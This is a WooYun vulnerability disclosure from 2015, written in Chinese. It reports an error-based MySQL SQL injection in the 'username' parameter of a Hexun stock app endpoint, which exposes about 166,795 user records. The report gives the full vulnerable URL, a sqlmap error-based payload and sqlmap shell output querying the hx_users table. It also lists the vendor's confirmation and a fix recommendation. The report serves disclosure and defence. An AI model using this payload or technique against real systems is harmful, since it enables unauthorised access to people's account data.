漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0141261
漏洞标题:和讯财经某app接口存在SQL注入漏洞影响数十万用户账户信息
相关厂商:和讯网
漏洞作者: 路人甲
提交时间:2015-09-15 13:30
修复时间:2015-10-30 13:48
公开时间:2015-10-30 13:48
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:18
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-09-15: 细节已通知厂商并且等待厂商处理中
2015-09-15: 厂商已经确认,细节仅向厂商公开
2015-09-25: 细节向核心白帽子及相关领域专家公开
2015-10-05: 细节向普通白帽子公开
2015-10-15: 细节向实习白帽子公开
2015-10-30: 细节向公众公开
简要描述:
mysql显错注入,涉及大量用户信息
详细说明:
和讯股票app,注入点如下
http://mtrack.hexun.com/track/hcstock.php?task=registeruser&userid=25863150&username=mail98318187&deviceuid=355136055562691&devicetoken=03551360555626910000001034000001&status=active&pushbadge=enabled
参数username存在注入,直接报错注入,方便快捷,而且很明显这个 点涉及到了用户相关的数据库
漏洞证明:
sqlmap
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: username (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: task=registeruser&userid=25863150&username=mail98318187' AND (SELECT 7125 FROM(SELECT COUNT(*),CONCAT(0x7162716b71,(SELECT (CASE WHEN (7125=7125) THEN 1 ELSE 0 END)),0x7162707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'NzpX'='NzpX&deviceuid=355136055562691&devicetoken=03551360555626910000001034000001&status=active&pushbadge=enabled
---
[04:34:18] [INFO] testing MySQL
[04:34:18] [INFO] confirming MySQL
[04:34:18] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[04:34:18] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> select count(*) from hx_users
[04:34:33] [INFO] fetching SQL SELECT statement query output: 'select count(*) from hx_users'
[04:34:33] [INFO] heuristics detected web page charset 'ascii'
[04:34:33] [WARNING] reflective value(s) found and filtering out
[04:34:33] [INFO] retrieved: 166795
select count(*) from hx_users: '166795'
sql-shell>
修复方案:
过滤,参数化
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2015-09-15 13:46
厂商回复:
谢谢 处理中
最新状态:
暂无